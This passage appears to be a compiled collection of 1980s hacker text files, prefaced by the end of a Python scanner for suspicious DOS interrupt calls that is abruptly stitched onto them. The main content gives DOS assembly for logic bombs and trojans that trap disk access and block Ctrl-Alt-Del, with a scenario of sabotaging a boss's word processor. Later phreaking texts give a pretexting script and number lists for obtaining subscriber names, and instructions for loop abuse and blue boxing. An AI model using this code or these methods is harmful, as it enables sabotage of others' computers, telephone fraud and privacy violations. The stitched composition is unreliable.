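            if r in ("ax", "cx", "dx", "bx"):                    # keep the 8-bit halves in sync
                regs[r[0] + "l"] = code[i + 1]
                regs[r[0] + "h"] = code[i + 2]
            i += 3
        elif op == 0xCD and i + 1 < len(code):                  # int imm8
            vec = code[i + 1]
            ah, al, ch = regs.get("ah"), regs.get("al"), regs.get("ch")
            if vec == 0x13 and ah == 0x05:
                drive = DRIVES.get(regs.get("dl", -1), "?")
                findings.append(Finding(i, f"INT 13h AH=05h format track: drive {drive} "
                                           f"head {regs.get('dh')} track {ch}"))
            if vec == 0x13 and ch is not None and ch > LAST_FLOPPY_TRACK:
                findings.append(Finding(i, f"INT 13h with CH={ch}: seeks beyond track {LAST_FLOPPY_TRACK}"))
            if vec == 0x21 and ah == 0x25:
                target = f"{al:02X}h" if al is not None else "?"
                findings.append(Finding(i, f"INT 21h AH=25h: installs a new handler for interrupt vector {target}"))
            i += 2
        else:
            i += 1                                              # an opcode we do not decode
    return findings


if __name__ == "__main__":
    for name, image in [("first.com", BIG_CURSOR), ("format track 0", FORMAT_TRACK0),
                        ("seize heads", SEIZE_HEADS), ("nostop.com", HOOK_KEYBOARD)]:
        print(f"{name} ({len(image)} bytes):")
        for f in scan_com(image) or [Finding(-1, "nothing suspicious")]:
            print(f"   offset {f.offset:04X}: {f.what}")
```

A real scanner would follow jumps and calls rather than sweep linearly, and would also treat INT 13h AH=03h (write sectors) and INT 26h (absolute disk write) with the same suspicion; this one is deliberately limited to the three patterns the article discusses.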
Creating false errors is good in several ways. They can cause a user to go nuts with his system and also cause no damage to the computer, unless the user gets so mad he beats his machine to death. False errors are just what they sound like: errors that shouldn't be happening. If this code is used, you can add it into a program, thus creating a hassling logic bomb. Take for example:

Let's say that I have added some code into a word processor to create false errors with the disk drive on November 21 and any day after that, and I exchange this program for my boss's word processing program, or hell, I add it straight onto his word processor. Now my boss, we'll call him 'Mr. Dick', comes to work, OK? Now his computer works great up till November 21, right? Now let's say that November 21 rolls around, and on this day he writes a long report. Now when he tries to save his report, all he can get are errors. He loses everything, right, because he can't save the data. Mr. Dick decides to take apart his computer to have it fixed, but there is nothing wrong. He tries the software again, but it still doesn't work. So Mr. Dick goes completely insane, kills all of his family and is locked up. Well, I doubt it would go that far, but at any rate, here's some code.

This code fucks with the disk drive:

mov ah,35
mov al,04
int 21
mov ax,es
mov dx,bx
mov ds,ax
mov ah,25
mov al,13
int 21
mov ax,00
int 21

Here's a simple explanation. Interrupt vector four (overflow) is read:

mov ah,35
mov al,04
int 21

Interrupt vector 13 (disk access) is redirected to vector four. Since this interrupt is not defined, the disk interrupt is not serviced:

mov ax,es
mov dx,bx
mov ds,ax
mov ah,25
mov al,13
int 21

The program is ended with an interrupt 21:

mov ax,00
int 21

So basically all disk accesses are trapped. The errors you get depend on the buffer size in your CONFIG.SYS file. This can be done with all sorts of devices without much effort. Here's another one for your disk drive.
This one triples the load time:

mov ax,0000
mov ds,ax
mov bx,0522        (Parameter address)
mov ah,ff          (The step rate)
mov [bx],ah
xor ax,ax
int 13
mov ah,00
int 21

Well, this is probably enough for simulated errors, so onward.

Simulated Crashes.
------------------

This has always been a classic for the logic bomb. The thing that is the most difficult about simulated crashes is that it is hard to redirect the Alt-Ctrl-Del function. This is a small program that can do this, and this one is a handy one also. I will explain. Here's the code:

mov ah,35
mov al,04
int 21
mov ax,es
mov dx,bx
mov ds,ax
mov ah,25
mov al,09
int 21
mov ax,0000
int 21

After you run this program, you will see that in order for you to regain control over the keyboard, you must turn off the computer. The good thing about this is that, let's say we have a trojan horse and we would like to make sure the user won't stop it, you could use this program. As an example, punch in this code and save it as 'nostop.com'. Now create a batch file with the following:

nostop
dir *.*
dir *.*/p

Note that once the batch file is started, you can't stop it, not even with a warm boot. You must turn off the computer. Now if a trojan horse is started with this first, it can't be stopped. On some people's systems, they may have uninterruptible power supplies; thus, even when they turn the system off, the program (trojan) keeps going!

Well, before I end this file, I would like to state something to all the Commodore users out there. You know, us Commie users (yes, I have one too) have a big problem in writing trojans. It is so noticeable when the heads start to bang when formatting, so you never get too far. Also, it is total hell to write a virus on. So here are two hints for you guys.

As you may or may not know, when a disk is verified, all files with the extension 'USR' are wiped out. Really! Look it up in your manual!
A good method for a trojan on the Commie is to write a small program that does this (the program must look big, though; this is to explain the disk access time). Have the program change all files to USR files, then have it verify the disk. This will keep the heads from knocking and will kill everything.

Also, here's another hint: read the next issue of Critical Mass, because I intend to include part two of 'Destructive Programs For Your IBM PC'. In part two, these are the topics to be discussed:

Part II
---------
Simple Data Manipulation.
A Virus for your Commodore 64/128
Three viruses for your IBM
How to make a text file into a trojan horse.
What to look for in deadly files and how to protect yourself

Hopefully we will get all that in the next issue. If you have any insults, questions, threats or comments, please e-mail `The Beaver` at the place at the end of this text. Till then, Ciao.

---====---

The following file was written many years ago (1983) about basic telefone hacking. It would be my guess that the fone numbers given are no good whatsoever, but ANI and customer loops are still in use. So for your reading enjoyment, I threw BIOC AGENT's text file in after a lot of editing.

IV
--

*******BIOC AGENT 003'S COURSE IN*******
**      =BASIC TELECOMMUNICATIONS=    **
**              PART II               **
****************************************

*PREFACE: IN PART II, WE WILL EXPLORE THE VARIOUS SPECIAL BELL #'S, SUCH AS: CN/A, AT&T NEWSLINES, LOOPS, 99XX #'S, ANI, RINGBACK, AND A FEW OTHERS.

CN/A:
-----

CN/A, WHICH STANDS FOR CUSTOMER NAME AND ADDRESS, ARE BUREAUS THAT EXIST SO THAT AUTHORIZED BELL EMPLOYEES CAN FIND OUT THE NAME AND ADDRESS OF ANY CUSTOMER IN THE BELL SYSTEM. ALL #'S ARE MAINTAINED ON FILE, INCLUDING UNLISTED #'S. HERE'S HOW IT WORKS:

1) YOU HAVE A # AND YOU WANT TO FIND OUT WHO OWNS IT, E.G. (914) 555-1234.

2) YOU LOOK UP THE CN/A # FOR THAT NPA IN THE LIST BELOW. IN THE EXAMPLE, THE NPA IS 914 AND THE CN/A # IS 518-471-8111.
3) YOU THEN CALL UP THE CN/A # (DURING BUSINESS HOURS) AND SAY SOMETHING LIKE, "HI, THIS IS JOHN JONES FROM THE RESIDENTIAL SERVICE CENTER IN MIAMI. CAN I HAVE THE CUSTOMER'S NAME AT 914-555-1234. THAT # IS 914-555-1234." MAKE UP YOUR OWN REAL-SOUNDING NAME, THOUGH.

4) IF YOU SOUND NATURAL & CHEERY, THE OPERATOR WILL ASK NO QUESTIONS.

HERE'S THE LIST:

NPA  CN/A #           NPA  CN/A #
---  ------------     ---  ------------
201  201-676-7070     517  313-232-8690
202  202-384-9620     518  518-471-8111
203  203-789-6800     519  416-487-3641
204  ****N/A*****     601  601-961-0877
205  205-988-7000     602  303-232-2300
206  206-382-8000     603  617-787-2750
207  617-787-2750     604  604-432-2996
208  303-232-2300     605  402-345-0600
209  415-546-1341     606  502-583-2861
212  518-471-8111     607  518-471-8111
213  213-501-4144     608  414-424-5690
214  214-948-5731     609  201-676-7070
215  412-633-5600     612  402-345-0600
216  614-464-2345     613  416-487-3641
217  217-525-7000     614  614-464-2345
218  402-345-0600     615  615-373-5791
219  317-265-7027     616  313-223-8690
301  301-534-1168     617  617-787-2750
302  412-633-5600     618  217-525-7000
303  303-232-2300     701  402-345-0600
304  304-344-8041     702  415-546-1341
305  912-784-9111     703  804-747-1411
306  ****N/A*****     704  912-784-9111
307  303-232-2300     705  416-487-3641
308  402-345-0600     707  415-546-1341
309  217-525-7000     709  ****N/A*****
312  312-769-9600     712  402-345-0600
313  313-223-8690     713  713-658-1793
314  314-436-3321     714  213-995-0221
315  518-471-8111     715  414-424-5690
316  816-275-2782     716  518-471-8111
317  317-265-7027     717  412-633-5600
318  318-227-1551     801  303-232-2300
319  402-345-0600     802  617-787-2750
401  617-787-2750     803  912-784-9111
402  402-345-0600     804  804-747-1411
403  403-425-2652     805  415-546-1341
404  912-784-9111     806  512-828-2502
405  405-236-6121     807  416-487-3641
406  303-232-2300     808  212-226-5487
408  415-546-1341     (BERMUDA ONLY)
412  412-633-5600     809  212-334-4336
413  617-787-2750     812  317-265-7027
414  414-424-5690     813  813-228-7871
415  415-546-1132     814  412-633-5600
416  416-487-3641     815  217-525-7000
417  314-436-3321     816  816-275-2782
418  514-861-6391     817  214-948-5731
419  614-464-2345     819  514-861-6391
501  405-236-6121     901  615-373-5791
502  502-583-2861     902  902-421-4110
503  503-241-3440     903  ****N/A*****
504  504-245-5330     904  912-784-9111
505  303-232-2300     906  313-223-8690
506  506-657-3855     907  ****N/A*****
507  402-345-0600     912  912-784-9111
509  206-382-8000     913  816-275-2782
512  512-828-2501     914  518-471-8111
513  614-464-2345     915  512-828-2501
514  514-861-6391     916  415-546-1341
515  402-345-0600     918  405-236-6121
516  518-471-8111     919  912-784-9111

BELL USES THESE #'S MAINLY TO FIND OUT WHO OWNS A # THAT A CUSTOMER CLAIMS HE NEVER CALLED.

NOTE: THIS IS THE MOST COMPLETE LIST OF CN/A #'S IN MY POSSESSION (WITH ONLY 5 #'S NOT AVAILABLE). THIS LIST WAS COPYRIGHTED IN 1982 BY "JUDAS GERARD" AS IT ORIGINALLY APPEARED IN TAP ISSUE #78. (TAP, ROOM 603, 147 W 42ND ST, NEW YORK, NY 10036 -- SUBSCRIPTIONS $10/YR.)

AT&T NEWSLINES:
---------------

NEWSLINES ARE RECORDINGS THAT BELL EMPLOYEES CALL UP TO FIND OUT THE LATEST INFO ON STOCK, TECHNOLOGY, ETC. CONCERNING THE BELL SYSTEM. HERE ARE THE #'S THAT ARE CURRENTLY KNOWN TO PHREAKS (AT LEAST TO ME ANYWAY):

201-483-3800 NJ          513-421-9060 OH
203-771-4920 CT          516-234-9914 NY
212-393-2151 NY          518-471-2272 NY
213-621-4141 CA          617-955-1111 MA
213-829-0111 CA (GTE)    702-789-6711 NV
213-449-8830 CA          713-224-6116 TX
312-368-8000 IL          714-238-1111 CA
313-223-7223 MI          717-255-5555 PA
314-247-5511 MO          717-787-1031 PA
408-493-5000 CA          802-955-1111 VE
412-633-3333 PA          808-533-4426 HI
414-678-3511 WI          813-223-5666 FL
416-929-4323 ONT.        914-948-8100 NY
503-228-6271 OR          916-480-8000

========LOOPS========

FIRST OF ALL, YOU MUST UNDERSTAND THE CONCEPT OF LOOPS. I THINK THAT THE BEST WAY THAT THIS IS UNDERSTOOD IS THE WAY THAT PHRED PHREEK EXPLAINED IT...

"NO SELF-RESPECTING PHONE PHREAK CAN GO THROUGH LIFE WITHOUT KNOWING WHAT A LOOP IS, HOW TO USE ONE, AND THE TYPES THAT ARE AVAILABLE. THE LOOP IS A GREAT ALTERNATIVE COMMUNICATION MEDIUM THAT HAS MANY POTENTIAL USES THAT HAVEN'T EVEN BEEN TAPPED YET.
IN ORDER TO EXPLAIN WHAT A LOOP IS, IT WOULD BE HELPFUL TO VISUALIZE TWO PHONE NUMBERS (LINES) JUST FLOATING AROUND IN THE TELCO CENTRAL OFFICE (CO). NOW, IF YOU (AND A FRIEND PERHAPS) WERE TO CALL THESE TWO NUMBERS AT THE SAME TIME, POOOOPFFF!!!, YOU ARE NOW CONNECTED TOGETHER.

I HEAR WHAT YOU'RE SAYING OUT THERE..., "BIG DEAL" OR "WHY SHOULD MA BELL COLLECT HER TWO MSU'S (MESSAGE UNITS) FOR ONE LOUSY PHONE CALL!?" WELL... THINK AGAIN. HAVEN'T YOU EVER WANTED SOMEONE TO CALL YOU BACK BUT WERE RELUCTANT TO GIVE OUT YOUR HOME PHONE NUMBER (LIKE THE LAST TIME YOU TRIED TO GET YOUR FRIEND'S UNLISTED # FROM THE BUSINESS OFFICE)? OR HOW ABOUT A COLLECT CALL TO YOUR FRIEND WAITING ON A LOOP, WHO WILL GLADLY ACCEPT THE CHARGES? OR BETTER YET, STUMBLING UPON A LOOP THAT YOU DISCOVER HAS MULTI-USER CAPABILITY (FOR THOSE LATE-NIGHT CONFERENCES). BEST OF ALL IS FINDING A NON-SUPERVISED LOOP THAT DOESN'T CHARGE ANY MSU'S OR TOLLS TO ONE OR BOTH PARTIES.

EXAMPLE: MANY MOONS AGO, A LOOP AFFECTIONATELY KNOWN AS 'THE 332 LOOP' WAS NON-SUP (IE, NON-SUPERVISED) ON THE TONE SIDE. I HAD MY FRIEND IN CALIFORNIA DIAL THE FREE (NON-SUP) SIDE, (212) 332-9906, AND I DIALED THE SIDE THAT CHARGED, 332-9900. AS YOU CAN SEE, I WAS CHARGED ONE MSU, AND MY FRIEND WAS CHARGED ZILCH, FOR AS LONG AS WE WISHED TO TALK!!!"

AHHH... HAVE I PERKED YOUR INTEREST YET? IF SO, HERE IS HOW TO FIND A LOOP OF YOUR VERY OWN. FIRST, DO ALL OF YOUR LOOP SEARCHING AT NIGHT! THIS IS BECAUSE THE LOOPS SERVE A GENUINE TEST FUNCTION WHICH TELCO USES DURING THE DAY. (WE DON'T WANT TO RUN INTO AN IRATE LINEMAN NOW, DO WE?) TO FIND A LOOP, HAVING 2 #'S IS A DEFINITE PLUS. IF NOT, HAVE A FRIEND DIAL #'S AT HIS LOCATION.
LAST RESORT, TRY DIALING FROM TWO ADJACENT PAY PHONES. NOW GET YOUR TRUSTY WHITE PAGES (*), AND TURN TO THE PAGE WHERE IT LISTS THE # OF MSU'S FROM YOUR EXCHANGE (OR EXCHANGES IN YOUR PRIMARY CALLING AREA). THE IDEA IS TO FIND A LOOP THAT IS WITHIN YOUR PRIMARY CALLING AREA OR IS ONLY 1 MSU IN YOUR AREA (CALL AREA A). THIS IS SO YOU DON'T GO BANKRUPT TRYING TO FIND A LOOP. WRITE DOWN ALL OF THESE EXCHANGES AND DO A 99XX SCAN OF THOSE EXCHANGES (99XX SCANNING WILL BE DISCUSSED SHORTLY).

BEFORE WE GET UP TO 99XX SCANNING, WE WILL LOOK AT SOME OTHER LOOP INFO: LOOPS ARE FOUND IN PAIRS WHICH ARE USUALLY CLOSE TO EACH OTHER. FOR EXAMPLE, IN NPA 212, WHERE THE INFAMOUS LOOPS ARE FOUND, THERE IS A STANDARD LOOP FORMAT:

MANHATTAN & BRONX ------- NNX-9977/9979
BROOKLYN & QUEENS ------- NNX-9900/9906

NNX IS THE EXCHANGE TO BE SCANNED. HERE ARE SOME LOOPS THAT HAVE BEEN FOUND IN NYC. THESE ARE USED MOSTLY BY PHREAKS AND CALL-IN LINES FOR PIRATE RADIO STATIONS:

212-220-9900/9906
212-283-9977/9979
212-352-9900/9906
212-365-9977/9979
212-529-9900/9906
212-562-9977/9979
212-982-9977/9979
212-986-9977/9979

THE LOWER # IS THE TONE SIDE (SINGING SWITCH). THE HIGHER # IS ALWAYS SILENT. THE TONE DISAPPEARS ON THE LOWER # WHEN SOMEBODY DIALS IN THE OTHER SIDE OF THE LOOP. IF YOU ARE ON THE HIGHER #, YOU'LL HAVE TO LISTEN TO THE CLICKS TO SEE IF SOMEBODY DIALED IN.

THE NYC 982 & 986 LOOPS ARE DIFFERENT FROM OTHERS. USUALLY WHEN YOU PARK ON A LOOP, YOU WILL HEAR WHOEVER CALLS IN ON THE OTHER HALF. WHEN THEY'RE DONE, THE NEXT CALLER (IF ANY) WILL BE QUEUED IN, ONE AFTER ANOTHER. ON THE NYC 982 & 986, YOU SOMETIMES CAN'T GET ANY MORE CALLERS IN AFTER THE FIRST. FURTHERMORE, IF YOU PARK ON ONE OF THESE LOOPS AND THERE IS NOBODY ON THE OTHER END FOR MORE THAN 4 MINUTES, YOU MAY BE AUTOMATICALLY DISCONNECTED. THESE LOOPS ARE GOOD FOR BACK-UP PURPOSES WHEN ALL OTHER LOOPS ARE BUSY.
99XX SCANNING:
--------------

MOST EVERY EXCHANGE IN THE BELL SYSTEM HAS A WIDE VARIETY OF TEST #'S AND OTHER "GOODIES," SUCH AS LOOPS. THESE "GOODIES" ARE USUALLY FOUND BETWEEN 9900 AND 9999 IN YOUR LOCAL EXCHANGE. IF YOU HAVE THE TIME AND INITIATIVE, SCAN YOUR EXCHANGE AND YOU MAY BECOME LUCKY! HERE ARE MY FINDINGS IN THE 914-268:

9901 - VERIFICATION (RECORDING OF A/C AND EXCHANGE)
9936 - VOICE # TO THE TELCO CO
9937 - VOICE # TO THE TELCO CO
9941 - CARRIER
9960 - OSC. TONE (TONE SIDE LOOP)
9963 - TONE (STOPS: MUTED)
9966 - CARRIER
9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS

MOST OF THE #'S BETWEEN 9900 & 9999 WILL RING, BE BUSY, GO TO A SPECIAL INTERCEPT OPERATOR ("WHAT #, PLEASE?"), OR WILL GO TO A "THE # YOU HAVE REACHED..." RECORDING. WHAT YOU FIND DEPENDS UPON THE SWITCHING EQUIPMENT IN THE EXCHANGE AND THE TELCO OPERATING COMPANY.

WHEN SEARCHING FOR LOOPS, YOU MAY FIND ONE OF THE FOLLOWING POSSIBILITIES WHEN YOU FIND ONE:

1. YOU CAN HEAR THROUGH THE LOOP (NOT MUTED), BUT THERE IS A 1/2 SECOND CLICK EVERY 10 SECONDS THAT INTERRUPTS THE AUDIO. THIS TYPE IS GOOD FOR BACK-UP USE BUT THE %$#'&" CLICK IS SUPER ANNOYING.
2. ONE SIDE OF THE LOOP IS BUSY; TRY IT AGAIN LATER.
3. THE TONE DISAPPEARS, BUT YOU CANNOT HEAR THROUGH IT (THE LOOP IS MUTED; TRY AGAIN IN A MONTH OR SO).
4. YOU GET "THE # YOU HAVE REACHED" RECORDING. NO LOOP THERE!

MOST LOOPS ARE MUTED (#3), BUT THEIR STATUS DOES CHANGE FROM TIME TO TIME. IT ALL DEPENDS IF THE TELCO MAINTENANCE PERSONNEL REMEMBER TO "THROW THE SWITCH", IE, TURN OFF THE LOOP.

SINCE I HAVE DONE THE ABOVE 914-268 99XX SCAN, CONGERS (268) HAS INSTALLED NEW SWITCHING EQUIPMENT (DMS100). SOME OF THE NUMBERS ARE THE SAME, BUT I HAVE NOTICED THAT ON THE DMS100, THE RECORDINGS ARE ALSO STORED IN THIS AREA. 268-9903, 9906, 9909, & 9912 ARE ALL DIFFERENT RECORDINGS. ALSO, THERE ARE 2 FORTRESS FONE RECORDINGS AT 268-9911 (DEPOSIT 5 CENTS OR ELSE) AND 268-9913 (DEPOSIT 10 CENTS).
NONE OF THESE RECORDINGS SUPE, AND A LOT OF OTHER 99XX #'S DON'T SUPE EITHER. IN SOME AREAS (LIKE MD), 9906-7 IS RINGBACK. IN WASHINGTON, THERE IS A SWEEP TONE TEST AT (202) 560-9944. IN NYC (212), YOU'LL FIND THE INFAMOUS LOOP LINES (AS MENTIONED ABOVE).

IT WILL BE EASIER TO SCAN YOUR EXCHANGE IF YOU MAKE UP A CHART LIKE THE ONE BELOW:

                  NPA-NNX-99XX SCAN
 !---------------------------------------------!
 !99XX>: 0 : 1 : 2 : 3 : 4 : 5 : 6 : 7 : 8 : 9 !
 !---------------------------------------------!
 ! 990 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 991 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 992 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 993 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 994 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 995 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 996 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 997 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 998 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!
 ! 999 :   :   :   :   :   :   :   :   :   :   !
 !---------------------------------------------!

THIS LEAVES YOU WITH 100 BOXES (1 FOR EACH # BETWEEN 9900 & 9999). YOU SHOULD MAKE YOUR BOXES BIG ENOUGH SO YOU CAN WRITE SOME SORT OF SHORTHAND IN THEM. FOR EXAMPLE:

B  - BUSY (TRY AGAIN AT ANOTHER TIME)
R  - RINGS (TRY AGAIN AT ANOTHER TIME)
O  - INTERCEPT OPERATOR ("WHAT # YOU CALLING?")
R1 - RECORDING 1 (MAKE A MARGIN NOTE OF THE TYPES OF RECORDINGS YOU GET)
T  - TONE          TONE AT A LOWER # +
I  - IGNORE        IGNORE AT A HIGHER # = LOOP
V  - VOICE # TO TELCO CO - THEY USUALLY ANSWER WITH THE CITY NAME OR AREA.
C  - CARRIER

THERE WILL BE OTHERS AND YOU SHOULD USE OTHER CHARACTERS THAT YOU CAN UNDERSTAND.

NOW, BACK TO LOOPS! AS YOU MAY HAVE NOTICED IN MY 914-268 SCAN, I FOUND A MUTED LOOP AND A TONE SIDE. 914-268 FAILED TO COME UP WITH THE SILENT SIDE OF A LOOP! THEREFORE, THERE IS NO LOOP IN THAT EXCHANGE.
I THEN SCANNED ANOTHER EXCHANGE IN MY PRIMARY CALLING AREA (914-634) AND I FOUND A LOOP!!

(914) 634-9923/9924

SO, IF AT FIRST YOU DON'T SUCCEED, MOVE ON TO ANOTHER EXCHANGE. IF YOU USE THE BOX METHOD THAT I HAVE OUTLINED ABOVE, YOU WILL SEE A T & I NEXT TO EACH OTHER FOR A LOOP.

SOME EXCHANGES ARE SPECIAL. FOR EXAMPLE, 914-623 IS A TESTING BUREAU. IN THIS EXCHANGE, NOT ONLY DID I FIND A LOOP, BUT I ALSO FOUND SEVERAL INTERESTING TONES, NOISES, AND OTHER TEST FUNCTIONS. ALSO, THE MORE IMPORTANT THE EXCHANGE IS, THE MORE YOU WILL FIND. FOR EXAMPLE, IN 914-623, I FOUND WELL OVER 10 VOICE #'S! ALSO, LOOPS ARE USUALLY, BUT NOT EXCLUSIVELY, FOUND IN THE 99XX SERIES. FOR EXAMPLE:

(713) 324-1799/1499

IS A LOOP.

THE PERFECT LOOP? HERE IS WHAT I WOULD LOOK FOR:

1. NON-SUP ON ONE OR BOTH SIDES. TO CHECK FOR A NON-SUP LOOP, GO TO A TONE-FIRST FORTRESS FONE AND DIAL THE #. IF IT ASKS FOR A DIME, IT IS SUPERVISED. IF THE CALL GOES THROUGH, THEN IT IS NON-SUPED!
2. 800 LOOPS WOULD BE A PLUS. THEY ARE NOT NECESSARILY FOUND BETWEEN 9900 & 9999 THOUGH. I WOULD CHECK THE 1XXX SERIES FIRST.
3. MULTI-USER LOOPS ARE ALSO A PLUS FOR THOSE LATE NIGHT CONFERENCES.

FINALLY, REMEMBER IT IS ONLY A LOCAL CALL TO FIND OUT WHAT YOUR CO HAS IN STORE FOR YOU. IF YOU FIND ANYTHING INTERESTING, BE SURE TO DROP ME A LINE.

NOTE: YOUR LOCAL WHITE PAGES CAN BE A VALUABLE ASSET. YOU CAN ALSO ORDER OTHER FONE BOOKS FROM YOUR BUSINESS OFFICE (USUALLY FREE FOR BOOKS WITHIN YOUR OPERATING COMPANY'S DISTRICT). A LARGE FONE BOOK, SUCH AS MANHATTAN, CONTAINS MUCH MORE INFO IN THE FIRST FEW PAGES THAN OTHER BOOKS.

======ANI======

AUTOMATIC NUMBER IDENTIFICATION (ANI) IS A NUMBER THAT YOU CALL UP THAT WILL TELL YOU WHAT # YOU ARE CALLING FROM. THIS HAS A FEW USES. FIRST, WERE YOU EVER SOMEWHERE AND THE FONE DIDN'T HAVE A # PRINTED ON IT? OR PERHAPS YOU WERE FOOLING AROUND IN SOME CANS (THOSE LARGE BOXES ON FONE POLES THAT CONTAIN TERMINALS FOR LINEMAN USE--TO BE DISCUSSED IN A FUTURE CHAPTER)
AND YOU WANT TO KNOW WHAT THE LINE # IS. IN NPA 914, THE ANI IS 990. IN NPA'S 212 & 516, ANI IS 958. THIS VARIES FROM AREA TO AREA. HERE ARE SOME OTHER ANI'S THAT I HAVE SEEN:

890-751-5191
2022222222
1-XXX-1111 (IN SOME 914 AREAS, ESP. UNDER STEP-BY-STEP SWITCHING EQUIPMENT, YOU HAVE TO DIAL 1-990-1111)

TO FIND ANI FOR OTHER AREAS, CHECK 3 DIGIT #'S FIRST, USUALLY IN THE 9XX SERIES (EXCLUDING 911). IN AREAS UNDER STEP-BY-STEP (TO BE DISCUSSED IN THE NEXT PART) TRY 1-9XX-1111. ANI MAY ALSO BE IN 99XX. LAST RESORT, TRY TO GET FRIENDLY WITH YOUR NEIGHBOR WHO WORKS FOR THE FONE COMPANY.

RINGBACK:
---------

RINGBACK, AS ITS NAME IMPLIES, CALLS BACK THE # YOU ARE AT WHEN YOU DIAL THE RINGBACK #. RINGBACK, IN NPA 914, IS 660. YOU DIAL 660 + THE LAST 4 DIGITS OF THE FONE. YOU WILL THEN GET A TONE; HANG UP QUICKLY AND PICK UP IN ABOUT 2 SECONDS. YOU WILL THEN GET A SECOND TONE; HANG UP AGAIN AND THE FONE WILL RING. IN NYC, IT IS ALSO 660, BUT YOU MAY HAVE TO PRESS 6 OR 7 BEFORE YOU HANG UP FOR THE FIRST TIME (IE, AT THE FIRST TONE). OTHER RINGBACK #'S THAT I HAVE SEEN ARE:

26011 - THIS 5 DIGIT FORMAT IS USED PRIMARILY ON STEP-BY-STEP. THE LAST 2 DIGITS (11) ARE DUMMY DIGITS.
890-897-XXXX - XXXX ARE THE LAST 4 DIGITS OF THE FONE #.
119911/11911/1199911 - GTE
NNX-9906/9907 - NPA 301, NNX IS THE EXCHANGE

THE REASON YOU GET THE TONE WHEN YOU PICK UP AFTER IT RINGS IS BECAUSE IN SOME AREAS, PEOPLE WERE USING RINGBACK AS AN IN-HOUSE INTERCOM. THEY WOULD DIAL RINGBACK, AND WHEN IT STOPPED RINGING, THEY WOULD PICK UP & TALK WITH THE PERSON WHO PICKED UP THE OTHER EXTENSION. BELL DIDN'T LIKE THIS, SINCE THERE IS USUALLY ONLY 1 PIECE OF EQUIPMENT IN EACH EXCHANGE THAT DOES THE RINGBACK. WHEN PEOPLE USED THIS AS AN INTERCOM, LINEMEN & REPAIRMEN COULDN'T GET THROUGH! IN SOME AREAS, ESPECIALLY THOSE UNDER STEP-BY-STEP, RINGBACK CAN STILL BE USED AS AN INTERCOM. ALSO, UNDER STEP-BY-STEP, THE RINGBACK PROCEDURE IS USUALLY SIMPLE.
FOR EXAMPLE, IN ONE AREA YOU WOULD DIAL 26011 AND HANG UP; IT WOULD THEN RING BACK.

TOUCH-TONE TEST:
----------------

IN AREAS THAT HAVE A TOUCH-TONE TEST, YOU DIAL THE RINGBACK #. AT THE FIRST TONE, YOU TOUCH-TONE DIGITS 1-0. IF THEY ARE CORRECT IT WILL BEEP TWICE. I HAVE ALSO SEEN A TT TEST IN SOME AREAS AT: 890-751-5191

COMING SOON:
------------

IN THE NEXT PART, WE WILL LOOK AT VARIOUS SWITCHING EQUIPMENT AND THE NETWORK.

BREAK UP OF BELL:
-----------------

THE OPERATING COMPANIES ARE NOT GOING TO CHANGE ALL THE SWITCHING EQUIPMENT AROUND. WHILE THERE WILL BE SOME CHANGES, MOST OF THE INFORMATION PROVIDED HERE WILL REMAIN PERTINENT AFTER JANUARY 1, 1984. JUST SUBSTITUTE THE WORD "FONE NETWORK" FOR BELL SYSTEM.

AU REVOIR,
*****BIOC*=$=*AGENT*****
DECEMBER 8, 1983

ACKNOWLEDGEMENTS: TAP, PHRED PHREEK, JUDAS GERARD, THE MAGICIAN, DARKPRIEST, & MYSELF. I WOULD ALSO LIKE TO THANK THE MULCHER FOR HIS ASSISTANCE IN DISTRIBUTING THIS TUTORIAL.

The next text file was one of my favorites in my B-boxing days. As far as I know, the information in this text is still very good information, because AT&T still has not switched out all of their older equipment. It is still even possible to box off of 1-800 WATS lines! Even though I myself wouldn't. Read and learn why. I have found that some 305 area codes still work well though.

V
-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Better Homes and Blue Boxing
Part I
Theory of Operation
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

To quote Karl Marx, blue boxing has always been the most noble form of phreaking. As opposed to such things as using an MCI code to make a free fone call, which is merely mindless pseudo-phreaking, blue boxing is actual interaction with the Bell System toll network. It is likewise advisable to be more cautious when blue boxing, but the careful phreak will not be caught, regardless of what type of switching system he is under. In this part, I will explain how and why blue boxing works, as well as where.
In later parts, I will give more practical information for blue boxing and routing information.

To begin with, blue boxing is simply communicating with trunks. Trunks must not be confused with subscriber lines (or "customer loops"), which are standard telefone lines. Trunks are those lines that connect central offices. Now, when trunks are not in use (i.e., idle or "on-hook" state) they have 2600Hz applied to them. If they are two-way trunks, there is 2600Hz in both directions. When a trunk IS in use (busy or "off-hook" state), the 2600Hz is removed from the side that is off-hook. The 2600Hz is therefore known as a supervisory signal, because it indicates the status of a trunk: on-hook (tone) or off-hook (no tone). Note also that 2600Hz denotes SF (single frequency) signalling and is "in-band." This is very important. "In-band" means that it is within the band of frequencies that may be transmitted over normal telefone lines. Other SF signals, such as 3700Hz, are used also. However, they cannot be carried over the telefone network normally (they are "out-of-band") and are therefore not able to be taken advantage of as 2600Hz is.

Back to trunks. Let's take a hypothetical phone call. You pick up your fone and dial 1+806-258-1234 (your good friend in Amarillo, Texas). For ease, we'll assume that you are on #5 Crossbar switching and not in the 806 area. Your central office (CO) would recognize that 806 is a foreign NPA, so it would route the call to the toll centre that serves you. [For the sake of accuracy here, and for the more experienced readers, note that the CO in question is a class 5 with LAMA that uses out-of-band SF supervisory signalling]. Depending on where you are in the country, the call would leave your toll centre (on more trunks) to another toll centre, or office of higher "rank". Then it would be routed to central office 806-258 eventually, and the call would be completed.
Illustration:

A---CO1-------TC1------TC2----CO2----B

A   = you
CO1 = your central office
TC1 = your toll office
TC2 = toll office in Amarillo
CO2 = 806-258 central office
B   = your friend (806-258-1234)

